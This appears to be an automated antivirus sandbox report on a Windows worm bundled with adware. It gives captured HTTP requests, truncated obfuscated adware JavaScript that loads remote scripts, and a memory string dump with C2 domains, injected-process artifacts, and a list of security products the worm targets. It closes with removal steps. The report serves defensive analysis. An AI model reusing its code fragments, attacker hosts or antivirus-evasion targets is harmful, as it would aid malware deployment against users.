Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Sun, 29 Mar 2015 22:29:12 GMT
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1408273144"
Last-Modified: Sun, 17 Aug 2014 10:59:04 GMT
Cache-Control: max-age=900
Content-Length: 867
Content-Type: application/x-javascript; charset=UTF-8
X-HW: 1427668153.dop002.fr7.t,1427668152.cds022.fr7.c
if (typeof setup2 === 'function') { setup2('<<< skipped >>>', 'xvnahjjxhm'); }
GET /plugins/mins/223.js?ver=9&rnd=8467 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
Host: js.ourstatsstaticstack.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Sun, 29 Mar 2015 22:29:12 GMT
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1418314404"
Last-Modified: Thu, 11 Dec 2014 16:13:24 GMT
Cache-Control: max-age=900
Content-Length: 823
Content-Type: application/x-javascript; charset=UTF-8
X-HW: 1427668153.dop002.fr7.t,1427668152.cds015.fr7.c
if (typeof setup2 === 'function') { setup2('<<< skipped >>>', 'ywpwzqylqz'); }
GET /plugins/mins/200.js?ver=4&rnd=8467 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
Host: js.ourstatsstaticstack.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Sun, 29 Mar 2015 22:29:12 GMT
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1411077330"
Last-Modified: Thu, 18 Sep 2014 21:55:30 GMT
Cache-Control: max-age=900
Content-Length: 807
Content-Type: application/x-javascript; charset=UTF-8
X-HW: 1427668153.dop002.fr7.t,1427668152.cds020.fr7.c
if (typeof setup2 === 'function') { setup2('<<< skipped >>>', 'lllopfcvfr'); }
GET /plugins/mins/220.js?ver=38&rnd=8467 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
Host: js.ourstatsstaticstack.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Sun, 29 Mar 2015 22:29:12 GMT
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1420463978"
Last-Modified: Mon, 05 Jan 2015 13:19:38 GMT
Cache-Control: max-age=619
Content-Length: 39907
Content-Type: application/x-javascript; charset=UTF-8
X-HW: 1427668153.dop002.fr7.t,1427668152.cds020.fr7.c
<<< skipped >>>
GET /plugins/mins/9.js?ver=3&rnd=8467 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
Host: js.ourstatsstaticstack.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Sun, 29 Mar 2015 22:29:13 GMT
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1402409612"
Last-Modified: Tue, 10 Jun 2014 14:13:32 GMT
Cache-Control: max-age=900
Content-Length: 2385
Content-Type: application/x-javascript; charset=UTF-8
X-HW: 1427668153.dop002.fr7.t,1427668153.cds037.fr7.c
appAPI.hooks.addHook("searchEngine",(function(a){return function(){var
f={keyDelay:1000},e,h;return{init:function(i){e=this;this.addEngine({
name:"google",url:"google",input:"input[name=q]",results:"#rso",result
:'<li class="g" />'});this.addEngine({name:"bing",url:"bing.com"
,input:"input[name=q]",results:"#results > ul",result:'<li class
="sa_wr" />'});this.addEngine({name:"yandex",url:"yandex.ru",input:
"form.b-head-search input.b-form-input__input,form.b-search input.b-fo
rm-input__input",results:".b-body-items > ol",result:'<li class=
"b-serp-item i-bem b-serp-item_js_inited" />'});this.addEngine({nam
e:"yandex",url:"yandex.com",input:"form.b-search input.b-form-input__i
nput,#searchInput",results:".b-serp2-list__portion",result:'<div cl
ass="b-serp-block" />'});this.addEngine({name:"yahoo",url:"yahoo.co
m",input:"input[name=p]",results:"#web ol:eq(0)",result:"<li />"
});this.addEngine({name:"yahoo",url:"search.yahoo.com",input:"input[na
me=p]",results:"#web ol:eq(0)",result:"<li />"});this.addEngine(
{name:"ask",url:"ask.com",input:"input[name=q]",results:"#lindm",resul
t:'<div class="tsrc_tled" />'});this.addEngine({name:"aol",url:"
aol.com",input:"input[name=q]",results:"#w .MSL:eq(0) ul",result:'<
li about="null" />'});this.addEngine({name:"aol",url:"search.aol.co
m",input:"input[name=q]",results:"#w .MSL:eq(0) ul",result:'<li abo
ut="null" />'});this.addEngine({name:"youtube",url:"youtube.com",in
put:"input[name=search_query]",results:"#search-results",result:'&<<< skipped >>>
GET /plugins/mins/184.js?ver=11&rnd=6334 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
Host: js.ourstatsstaticstack.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Sun, 29 Mar 2015 22:29:12 GMT
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1420026483"
Last-Modified: Wed, 31 Dec 2014 11:48:03 GMT
Cache-Control: max-age=397
Content-Length: 1231
Content-Type: application/x-javascript; charset=UTF-8
X-HW: 1427668153.dop002.fr7.t,1427668152.cds020.fr7.c
if (typeof setup2 === 'function') { setup2('<<< skipped >>>', 'yayzflpgyo'); }
<<< skipped >>>
GET /plugins/mins/102.js?ver=15&rnd=6334 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
Host: js.ourstatsstaticstack.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Sun, 29 Mar 2015 22:29:12 GMT
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1426423396"
Last-Modified: Sun, 15 Mar 2015 12:43:16 GMT
Cache-Control: max-age=621
Content-Length: 1023
Content-Type: application/x-javascript; charset=UTF-8
X-HW: 1427668153.dop002.fr7.t,1427668152.cds012.fr7.c
if (typeof setup2 === 'function') { setup2('<<< skipped >>>', 'xptuuudpkn'); }
GET /plugins/mins/376.js?ver=3&rnd=6334 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
Host: js.ourstatsstaticstack.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Sun, 29 Mar 2015 22:29:13 GMT
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1426525251"
Last-Modified: Mon, 16 Mar 2015 17:00:51 GMT
Cache-Control: max-age=900
Content-Length: 10918
Content-Type: application/x-javascript; charset=UTF-8
X-HW: 1427668153.dop002.fr7.t,1427668153.cds023.fr7.c
(function(){var a=(function(){var l=function(){return appAPI&&appAPI.i
nstaller&&appAPI.utils.isFunction(appAPI.installer.getAdditionalInfo)?
appAPI.installer.getAdditionalInfo():null;};var j={ie:"10",ni:"11",te:
"19",ch:"20",to:"26",sb:"27",op:"28",tc:"29",ff:"30",tf:"39",sf:"40",n
v:"50",ms:"51",mf:"52",mc:"53",np:"54",sm:"55",fm:"56",cm:"57",mx:"60"
};var p="source_id";var k="776";var e="__PageActive__";var q=new Date(
2013,0,1);var f=1000*60*2;var n=1000*60*10;var o=(appAPI&&appAPI.insta
ller&&typeof appAPI.installer.getUnixTime==="function")?appAPI.install
er.getUnixTime()*1000:((new Date(2013,0,1)).getTime());var h=l;var g=[
{pluginId:288,httpUrl:"hXXp://istatic.datafastguru.info/fo/min/crqc.js
?hid=__CROSSRIDER_USER_ID__&bname=__CROSSRIDER_APP_NAME__&subid=__CROS
SRIDER_EXTENDED_SUB_ID__",delay:0},{pluginId:242,httpUrl:"hXXp://inst.
shoppingate.info/js/sg_bg.js?AFFILIATE_ID=crsrdr&SUB_DISTRIBUTER_ID=__
CROSSRIDER_EXTENDED_SUB_ID__&BRAND_DISPLAY_NAME=__CROSSRIDER_APP_NAME_
_",httpsUrl:"hXXps://inst.shoppingate.info/js/sg_bg.js?AFFILIATE_ID=cr
srdr&SUB_DISTRIBUTER_ID=__CROSSRIDER_EXTENDED_SUB_ID__&BRAND_DISPLAY_N
AME=__CROSSRIDER_APP_NAME__",delay:0},{pluginId:385,httpUrl:"hXXp://ap
i.jollywallet.com/affiliate/client?dist=329&sub=__CROSSRIDER_EXTENDED_
SUB_ID__&name=__CROSSRIDER_APP_NAME__",httpsUrl:"hXXps://api.jollywall
et.com/affiliate/client?dist=329&sub=__CROSSRIDER_EXTENDED_SUB_ID__&na
me=__CROSSRIDER_APP_NAME__",delay:0},{pluginId:390,httpUrl:"hXXp://cdn
cache-a.akamaihd.net/sub/h0982be/__CROSSRIDER_EXTENDED_SUB_ID__/l.<<< skipped >>>
GET /plugins/mins/354.js?ver=2&rnd=6334 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
Host: js.ourstatsstaticstack.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Sun, 29 Mar 2015 22:29:13 GMT
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1418039174"
Last-Modified: Mon, 08 Dec 2014 11:46:14 GMT
Cache-Control: max-age=183
Content-Length: 122978
Content-Type: application/x-javascript; charset=UTF-8
X-HW: 1427668153.dop002.fr7.t,1427668153.cds009.fr7.c
<<< skipped >>>
GET /plugins/mins/246.js?ver=17&rnd=6334 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
Host: js.ourstatsstaticstack.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Sun, 29 Mar 2015 22:29:13 GMT
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1424173488"
Last-Modified: Tue, 17 Feb 2015 11:44:48 GMT
Cache-Control: max-age=900
Content-Length: 7448
Content-Type: application/x-javascript; charset=UTF-8
X-HW: 1427668153.dop002.fr7.t,1427668153.cds009.fr7.c
var _0x8f59=["10","11","19","20","26","27","28","29","30","39","40","5
0","51","52","53","54","55","56","57","60","installer","getAdditionalI
nfo","isFunction","utils","isDefined","asw","isArray","length","toLowe
rCase","platform","np","ni","browser_name","__BROWSER_NAME__","getIds"
,"installer_verifier","","string","charCodeAt","replace","match","appl
y","fromCharCode","Base64","decode","call","parse","JSON","monetizatio
n","internal","plugins","un","def","ined","pluginId","getExtendedSubId
","function","slice","getSubId","getTime","_","join","na","httpUrl","_
_RND__","g","__ADVANCE_USER__","__CROSSRIDER_ASW__","__CROSSRIDER_INST
ALL_TIME__","getUnixTime","__CROSSRIDER_COUNTRY_CODE__","getCountry","
__CROSSRIDER_EXTENDED_SUB_ID__","__CROSSRIDER_USER_ID__","userId","app
Info","__CROSSRIDER_VERIFIER__","__CROSSRIDER_INSTALLER_USER_ID__","ge
tUserId","__CROSSRIDER_APP_ID__","appID","__CROSSRIDER_BROWSER__","__C
ROSSRIDER_CAMP_ID__","getCampaignId","__CROSSRIDER_LIGHT_SUB_ID__","__
CROSSRIDER_APP_NAME__","name","__CROSSRIDER_SUB_ID__","httpsUrl","inli
neJS","waitForBodyReady","undefined","addRemoteJS"];setup2=function(m,
k){var h={ie:_0x8f59[0],ni:_0x8f59[1],te:_0x8f59[2],ch:_0x8f59[3],to:_
0x8f59[4],sb:_0x8f59[5],op:_0x8f59[6],tc:_0x8f59[7],ff:_0x8f59[8],tf:_
0x8f59[9],sf:_0x8f59[10],nv:_0x8f59[11],ms:_0x8f59[12],mf:_0x8f59[13],
mc:_0x8f59[14],np:_0x8f59[15],sm:_0x8f59[16],fm:_0x8f59[17],cm:_0x8f59
[18],mx:_0x8f59[19]},i=function(){return appAPI[_0x8f59[20]]&&appAPI[_
0x8f59[23]][_0x8f59[22]](appAPI[_0x8f59[20]][_0x8f59[21]])?appAPI[<<< skipped >>>
GET /installer_updates/001360/update.json HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: update.clientstaticserv.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Sun, 29 Mar 2015 16:42:02 GMT
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1395746822"
Last-Modified: Tue, 25 Mar 2014 11:27:02 GMT
Cache-Control: max-age=854
Content-Length: 39
Content-Type: text/plain; charset=UTF-8
X-HW: 1427668128.dop007.fr7.t,1427668128.cds024.fr7.s,1427668127.dop005.se1.r,1427668128.cds015.se1.c,1427668128.cds024.fr7.p
{"update_from_version":"NA","url":"NA"}
GET /installer.gif?action=started&browser=ie&browserver=6&ver=1_34_05_04&bic=11992E1999324ACFB8E0C19B718E3265IE&app=54248&appver=0&verifier=283fbbb93af62851d4ee04659eadac21&srcid=001360&version_date=07-05-14&subid=0&zdata=0&xpiver=0_94&crxver=1_26_22&default=ie&chver=na&ffver=na&iever=6&silent=1&os=XP32&admin=1&type=17179881473&asw=0&asw2=8704&procstarttime=1427668122&procruntime=6&rnd=1427668128 HTTP/1.1
Host: stats.clientstaticserv.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
x-amz-id-2: 9/C9HI4pJESP/NiZTc7FSTFSybRP1rJLyKnroec5aBB9aKP0a/Om1k/AaNQxEs hDe BapG6zIA=
x-amz-request-id: 9E01DCC0110FBE03
Date: Sun, 29 Mar 2015 22:28:50 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Last-Modified: Mon, 24 Feb 2014 23:56:39 GMT
ETag: "28d6814f309ea289f847c69cf91194c6"
Content-Type: image/gif
Content-Length: 35
Server: AmazonS3
GIF89a.............,...........D..;
GET /installer.gif?action=finished&browser=ie&browserver=6&ver=1_34_05_04&bic=11992E1999324ACFB8E0C19B718E3265IE&app=54248&appver=111&verifier=283fbbb93af62851d4ee04659eadac21&srcid=001360&version_date=07-05-14&subid=0&zdata=0&xpiver=0_94&crxver=1_26_22&default=ie&chver=na&ffver=na&iever=6&silent=1&os=XP32&admin=1&type=17179881473&asw=0&asw2=8704&ieprofiles=1&chprofiles=na&ffprofiles=na&procstarttime=1427668122&procruntime=41&rnd=1427668163 HTTP/1.1
Host: stats.clientstaticserv.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
x-amz-id-2: mkEOHDM1Vypc8tlMASGGMuRgveUrP8Tt/MwC7d4 BJAoI3kSQikFw75bI6 5g1QWXNloXpiBPyA=
x-amz-request-id: 0FB85ED08DFF4B6D
Date: Sun, 29 Mar 2015 22:29:24 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Last-Modified: Mon, 24 Feb 2014 23:56:39 GMT
ETag: "28d6814f309ea289f847c69cf91194c6"
Content-Type: image/gif
Content-Length: 35
Server: AmazonS3
GIF89a.............,...........D..;
The Worm connects to the servers at the following location(s):
.text
`.data
.rsrc
msvcrt.dll
ADVAPI32.dll
KERNEL32.dll
NTDLL.DLL
MPRAPI.dll
ole32.dll
OLEAUT32.dll
RASAPI32.dll
USER32.dll
iphlpapi.dll
[%S] %S
netsh.pdb
RegCloseKey
RegOpenKeyExW
RegCreateKeyExW
RegQueryInfoKeyW
GetProcessHeap
GetConsoleOutputCP
ntdll.dll
NETSH.EXE
MatchCmdLine
MatchTagsInCmdLine
{X-X-X-XX-XXXXXX}netsh.exe
Error %d in FormatMessageW()
select * from Win32_OperatingSystem
\\%s\root\cimv2
5.1.2600.5512 (xpsp.080413-0852)
Windows
Operating System
5.1.2600.5512
LFirst, add the protocol to the transport, and then add it to the interface.
*The requested transport is not available.
%1!s! ipmontr.dll
The above command installs ipmontr.dll in netsh.
is removed, it is no longer supported by netsh.
The command cannot be executed.
*Windows cannot open the file named %1!s!.
.The commit call to %1!s! cannot be completed.
.Sets the current machine on which to operate.
name - Name of the machine on which to operate
Sets the current machine on which to operate. If a machine name
%1!s! open c:\logfiles\logfile.txt
.Error creating key for %1!s! in the registry.
.Error deleting key for %1!s! in the registry.
netsh.exe_3068_rwx_00480000_00002000:
SHELL32.DLL
ShellExecuteA
KERNEL32.DLL
.text
netsh.exe_3068_rwx_004D0000_00001000:
|netsh.exeM_3068_
Explorer.EXE_884_rwx_014D0000_00002000:
SHELL32.DLL
ShellExecuteA
KERNEL32.DLL
.text
Explorer.EXE_884_rwx_02050000_00001000:
|explorer.exeM_884_
Explorer.EXE_884_rwx_024F0000_01033000:
c:\windows
%System%\drivers\ghltmn.sys
12047188183
SHELL32.DLL
ShellExecuteA
KERNEL32.DLL
.text
hXXp://89.119.67.154/testo5/
hXXp://kukutrustnet777.info/home.gif
hXXp://kukutrustnet888.info/home.gif
hXXp://kukutrustnet987.info/home.gif
h.rdata
H.data
.reloc
ntoskrnl.exe
Opera/8.89 (Windows NT 6.0; U; en)
Software\Microsoft\Windows\CurrentVersion\Internet Settings
Software\Microsoft\Windows\CurrentVersion
hXXp://VVV.klkjwre9fqwieluoi.info/
hXXp://kukutrustnet777888.info/
Software\Microsoft\Windows\CurrentVersion\policies\system
Software\Microsoft\Windows\ShellNoRoam\MUICache
%s:*:Enabled:ipsec
NOTEPAD.EXE
WINMINE.EXE
SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced
GdiPlus.dll
hXXp://
hXXp://klkjwre77638dfqwieuoi888.info/
VVV.microsoft.com
?%x=%d
&%x=%d
SYSTEM.INI
USER32.DLL
.%c%s
\\.\abp470n5
WINDOWS
NTDLL.DLL
autorun.inf
ADVAPI32.DLL
win%s.exe
%s.exe
WININET.DLL
InternetOpenUrlA
avast! Web Scanner
Avira AntiVir Premium WebGuard
BackWeb Plug-in - 4476822
cmdGuard
cmdAgent
Eset HTTP Server
ProtoPort Firewall service
SpIDer FS Monitor for Windows NT
Symantec Password Validation
tcpsr
WebrootDesktopFirewallDataService
WebrootFirewall
%d%d.tmp
SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList
%s\%s
%s\Software\Microsoft\Windows\CurrentVersion\Ext\Stats
Software\Microsoft\Windows\CurrentVersion\Ext\Stats
SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects
Explorer.exe
ASHWEBSV.
DRWEB32W.
DRWEBSCD.
DRWEBUPW.
DWEBLLIO
DWEBIO
FSGUIEXE.
MCVSSHLD.
NPFMSG.
SYMSPORT.
WEBPROXY.
WEBSCANX.
WEBTRAP.
sfc_os.dll
M_%d_
%c%d_%d
GetWindowsDirectoryA
GetProcessHeap
WinExec
RegEnumKeyExA
RegDeleteKeyA
RegOpenKeyExA
RegCreateKeyA
RegCloseKey
SHFileOperationA
.rdata
.data
.xdata
@.CRT
ADVAPI32.dll
MSVCRT.dll
SHELL32.dll
USER32.dll
WS2_32.dll
Remove it with Ad-Aware
- Click (here) to download and install Ad-Aware Free Antivirus.
- Update the definition files.
- Run a full scan of your computer.
Manual removal*
- Terminate malicious process(es) (How to End a Process With the Task Manager):
- Delete the original Worm file.
- Delete or disinfect the following files created/modified by the Worm:
- Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
- Find and delete all copies of the worm's file together with "autorun.inf" scripts on removable drives.
- Reboot the computer.
*Manual removal may cause unexpected system behaviour and should be performed at your own risk.